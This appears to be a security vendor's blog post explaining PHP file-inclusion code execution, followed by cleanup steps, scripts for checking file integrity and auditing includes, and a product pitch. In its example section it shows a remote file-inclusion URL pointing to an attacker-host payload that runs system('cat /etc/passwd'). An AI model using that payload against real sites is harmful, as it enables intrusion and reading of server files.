Arbitrary Code Execution Attack - Fixation and Prevention

In this age of the internet, many organizations have developed web-based applications to give users easy access and round-the-clock service. But poorly written web application code can be exploited to gain unauthorized access to user data and to the web server itself. To begin with, arbitrary code execution (ACE) describes a security flaw that allows an attacker to execute arbitrary commands (code) on the target system.

It means that any bad guy can make the target system run code of their choosing. The executed code might be code that already exists on the system or code inserted by the attacker through the vulnerability. In either case, an arbitrary code execution attack lets the attacker execute whatever they want on your system.

Related article – WordPress Sites at Risk From PHP Code Execution

How is arbitrary code execution attack performed?

To execute arbitrary code, the attacker first needs a foothold on the website, a gateway. This gateway is usually obtained by injecting a malicious file.

Websites are controlled and managed through a CMS and related extensions. This software is made up of files and folders. Certain folders are writable and allow uploading of files. Hackers, by varied means, upload a PHP file into such folders. Although these files don’t give full control over the website, they act as a gateway. File inclusion is of two types: Remote File Inclusion (RFI) and Local File Inclusion (LFI).

The vulnerability behind Remote File Inclusion (RFI) is largely found on websites running PHP. PHP lets a script ‘include’ or ‘require’ additional files; when the file name is built from untrusted input, this gives rise to a file inclusion vulnerability. Validating the input before passing it to these functions considerably reduces the risk of such exploitation.

In the case of Local File Inclusion (LFI), the attacker uses files already present on the server to execute a malicious script. A remotely included file can in turn be used to include locally available files and perform malicious actions.

Related article – Magento Remote Code Execution : Insights & Solution

Example: How Arbitrary Code is Executed

With this example, let us see how exactly an arbitrary code execution attack is carried out.

The swp_debug and swp_url parameters allow an attacker to perform remote code execution by passing the payload URL via the swp_url parameter.

Example Attack Vector: http://examplewp.org/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://pastebin.attacker.com/payload.txt

payload.txt content: <pre>system('cat /etc/passwd')</pre>

It returns the content of the /etc/passwd file.

Figure: How arbitrary code is executed

The end result is that the injected code coaxes an unexpected response out of the server. This response tells the hacker which code gets past the server’s defenses. Knowing the vulnerability, the hacker can now execute any malicious code on the server.

Arbitrary Code Execution (ACE) Attack – Fixation

Code Backup

A code backup is very important because it allows you to analyze the infection at a later stage. You are advised to back up your code regularly. It simplifies the process of hack removal. Even if you do not have a backup strategy in place, you can save time by copying the unaffected, good parts of the code instead of beginning from scratch.

Many users recommend restoring a previous backup after an attack. This will surely remove the infection and your site will work as before. But it leaves the security flaw unchecked.

Check core file integrity

Most core files should never be modified. The quickest way to check the core files for infection is to compare the current files with the originals using the diff command in a terminal. If no differences are visible, your core files are clean.

Check Recently modified files

If you have SSH access to your server, check the list of files that have been modified in the days since you noticed the hack. The -mtime option of the find command lists files modified in the last N days. It is used as follows:

find . -mtime -15 -ls

The above command lists all files under the current directory that were changed in the last fifteen days.
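The two checks above (comparing against a clean copy and listing recently modified files) can be scripted together. The following is an added example, not code from the original article: it builds a small constructed web root in a temporary directory (a pristine copy, a copy with one core file tampered and one file dropped into the uploads folder), then reports which files differ from the release and which were modified within a window. On a real site, PRISTINE would be a fresh download of the same release and CURRENT the live web root; those paths and the sample files are assumptions for the demo.

```shell
#!/bin/sh
# Added example, not code from the original article: check a web root against a
# pristine copy of the same CMS release, then list recently modified files.
# Every path below is constructed in a temporary directory so the script runs
# offline; on a real site PRISTINE would be a fresh download of the release and
# CURRENT the live web root.
set -u

WORK=$(mktemp -d)
PRISTINE="$WORK/pristine"
CURRENT="$WORK/current"

# Constructed sample tree: one untouched core file, one core file with an
# injected line, and one file that exists only in the web root (a dropped
# script stand-in under the writable uploads folder).
mkdir -p "$PRISTINE/wp-includes" "$CURRENT/wp-includes" "$CURRENT/wp-content/uploads"
printf '<?php echo "index";\n' > "$PRISTINE/index.php"
printf '<?php echo "index";\n' > "$CURRENT/index.php"
printf '<?php // core helper\n' > "$PRISTINE/wp-includes/functions.php"
printf '<?php // core helper\n// INJECTED LINE\n' > "$CURRENT/wp-includes/functions.php"
printf '<?php // not part of the release\n' > "$CURRENT/wp-content/uploads/x.php"
# Age the untouched file so the mtime check below has something to exclude.
touch -t 202001010000 "$CURRENT/index.php"

# Checksum manifest of a tree, paths relative to its root, sorted by path.
manifest() {
  ( cd "$1" && find . -type f -exec sha256sum {} + | LC_ALL=C sort -k2 )
}

# Paths whose content differs from the pristine copy or that are absent from
# it: the "> hash ./path" lines of the diff are exactly the current-side entries.
integrity_diff() {
  manifest "$1" > "$WORK/pristine.sha"
  manifest "$2" > "$WORK/current.sha"
  diff "$WORK/pristine.sha" "$WORK/current.sha" | awk '/^>/ { print $3 }'
}

# Files under a web root modified within the last N days (find -mtime -N).
recently_modified() {
  find "$1" -type f -mtime "-$2" | LC_ALL=C sort
}

echo "== changed or added relative to the pristine copy =="
integrity_diff "$PRISTINE" "$CURRENT"
echo "== modified in the last 15 days =="
recently_modified "$CURRENT" 15
```

The checksum comparison catches both silently edited core files and files that were never part of the release; the mtime listing is the quick first look, but an attacker can reset timestamps, so treat the checksum result as authoritative.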

Clean Hacked Files and database

Remove all the malicious code. Delete files that the attackers may have added. After each file removal, make sure that none of the site’s functionality and features are affected.

Pro Tip: The easiest way to identify hacked files is by comparing the present version of the site with a healthy backup.

Removing a malware infection from your website database is trickier. There are several third-party DB management tools, such as Adminer. Seek expert advice here.

Secure User Accounts

If you notice any unfamiliar and unusual users, remove them. It is recommended that there be only one admin user. Set other roles to the least amount of privileges needed. Delete all anonymous FTP accounts.

Change Passwords

Change passwords of your FTP account, SSH login, database, etc.

Update permissions for files and folders, limiting access to only what is necessary. Set 444 (read-only) permissions on files like .htaccess and index.php.

Remove Malware Warnings

If you were blacklisted by Google, you can request a review after fixing the infection. The review will not take long. Your website will regain its SEO status within 24 hours of review completion.

There are services that help you look through other blacklists. Among the many such services, MX Toolbox is a good choice: it checks your website against multiple lists and gives you an organized output. Note that different blacklists have different review processes.

Arbitrary Code Execution (ACE) Attack – Prevention

Vulnerability Scanning

Schedule regular vulnerability and malware scans. This allows you to address potential security issues at a nascent stage. Practice dorking: use Google search for hints of potential vulnerabilities, and remove their traces from your web applications.

Web Application Firewalls

A Web Application Firewall can blacklist referenced URLs to block zero-day vulnerability exploits of applications. A web application firewall can protect your site in multiple ways:

  • It detects attacks using application-layer knowledge and a pre-configured database of attack vector signatures.
  • It can identify the access patterns of automated tools.
  • It can blacklist hosts suspected of being attackers, so they are quickly identified and blocked in the future.

Blacklisting

Blacklisting IPs obtained from observing previous attacks could help prevent any future attacks originating from the same malicious source, thus tackling an attack before it even begins.

Disabling PHP execution

Disabling PHP execution in certain folders (writable folders like the Uploads folder in WordPress core) will go a long way toward securing your website. Astra Security Service offers features that allow disabling PHP execution.

Code Review

Don’t allow non-validated user input to reach file and include function parameters. Set Red Alert and charge phasers to maximum for any variable that feeds ‘include’ or ‘filesystem’ functions, and validate it with due caution. Be careful when downloading third-party libraries: some allow non-PHP files to be passed to the PHP interpreter, which attackers can exploit.
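A first pass over a code base for the include problem described here (and in the RFI/LFI section above) can be automated. The following is an added example, not code from the original article: a small one-hop taint heuristic in awk that flags PHP lines where include/require or a file-access function is fed by request data, either directly (a superglobal on the same line) or through a variable assigned from a superglobal earlier in the same file. The two sample PHP files are constructed here for the demo; the list of sink functions is an assumption you should extend for your own code base, and a flagged line is a candidate for review, not a confirmed bug.

```shell
#!/bin/sh
# Added example, not code from the original article: a one-hop taint heuristic
# that flags PHP lines where include/require or a file function is fed by
# request data, either directly ($_GET[...] on the same line) or through a
# variable assigned from request data earlier in the same file. It is a review
# aid, not a proof of safety. The sample files are constructed here so the
# script runs offline.
set -u

WORK=$(mktemp -d)
mkdir -p "$WORK/site/lib"

# Constructed: a page that builds an include path straight from $_GET.
cat > "$WORK/site/page.php" <<'EOF'
<?php
$page = $_GET['page'];
include($page . '.php');           // user input reaches include(): flagged
require_once 'lib/helpers.php';    // static path: not flagged
EOF

# Constructed: an allowlist lookup before include, plus one direct misuse.
cat > "$WORK/site/lib/helpers.php" <<'EOF'
<?php
$allowed = array('home' => 'home.php', 'about' => 'about.php');
$key = isset($_GET['page']) ? $_GET['page'] : 'home';
$file = isset($allowed[$key]) ? $allowed[$key] : 'home.php';
include $file;                              // allowlisted value: not flagged
echo file_get_contents($_POST['src']);      // request data in a sink: flagged
EOF

# Sinks worth reviewing: the include family and common file-access functions.
SINK_RE='(^|[^A-Za-z0-9_])(include|include_once|require|require_once|file_get_contents|fopen|readfile)([^A-Za-z0-9_]|$)'

# Print "file:line: code" for each flagged line of one PHP file. The file is
# read twice: pass 1 collects variables assigned from superglobals, pass 2
# checks sink lines against the superglobals and against those variables.
audit_file() {
  awk -v sinkre="$SINK_RE" -v name="$1" '
    FNR == NR {
      if ($0 ~ /\$_(GET|POST|REQUEST|COOKIE|FILES|SERVER)\[/ &&
          match($0, /\$[A-Za-z_][A-Za-z0-9_]*[ \t]*=[^=]/)) {
        v = substr($0, RSTART, RLENGTH); sub(/[ \t]*=.*/, "", v); tainted[v] = 1
      }
      next
    }
    $0 ~ sinkre {
      if ($0 ~ /\$_(GET|POST|REQUEST|COOKIE|FILES|SERVER)\[/) { print name ":" FNR ": " $0; next }
      for (v in tainted) if (index($0, v)) { print name ":" FNR ": " $0; break }
    }
  ' "$1" "$1"
}

# Audit every .php file under a directory.
audit_tree() {
  find "$1" -type f -name '*.php' | LC_ALL=C sort | while IFS= read -r f; do
    audit_file "$f"
  done
}

audit_tree "$WORK/site"
```

The allowlisted include in helpers.php passes because the value handed to include comes from the fixed array, not from the request; that is exactly the pattern to aim for. The heuristic only follows one assignment hop and matches variable names as substrings, so use it to find review candidates quickly, then read the flagged code.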

Disabling Directory Indexing

It is essential to disable directory browsing. Hackers can use directory browsing to find files with known vulnerabilities and then exploit them to gain unauthorized access. You can easily hide a folder from public access by modifying the .htaccess file slightly.

Check out: Disabling directory indexing in WordPress

Conclusion

It’s better to be safe than sorry. Hence, to stiffen your website’s security against such hacking attempts, it is recommended to invest in a premium security solution. Although there are many security companies around, Astra Web Security is a trusted name. Having Astra Firewall on your website adds immensely to your website’s security. Besides shielding your website from SQLi, XSS, CSRF, bad bots and 100+ other threats, Astra Firewall also provides continuous and comprehensive monitoring of your website. To get hands-on experience with this product, click here.

About The Author

Mahima Maheshwari

She is an Embedded Systems Engineer and a cybersecurity enthusiast. She spends most of her free time researching & reading. And loves to spread knowledge through blogs.
